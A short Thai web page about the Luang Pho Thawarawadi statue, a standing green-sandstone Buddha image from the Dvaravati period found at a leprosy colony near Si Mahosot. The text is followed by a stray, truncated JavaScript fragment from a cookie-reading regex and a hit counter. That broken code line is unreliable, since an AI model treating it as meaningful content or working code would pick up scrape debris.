หลวงพ่อทวาราวดี

หลวงพ่อทวาราวดี ปัจจุบันเก็บรักษาไว้ที่วิหารหน้าที่ว่าการอำเภอศรีมโหสถ เป็นพระพุทธรูปประทับยืนปางประทานธรรมสร้างจากหินทรายสีเขียวขนาดสูง ๑.๖๓ เมตร อายุประมาณพุทธศตวรรษที่ ๑๒-๑๔ ขุดพบในนิคมโรคเรื้อน โรงพยาบาลคามิโลทางทิศใต้นอกเมืองศรีมโหสถ

-(“(?:^|; )”-(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\\/

Hits: 399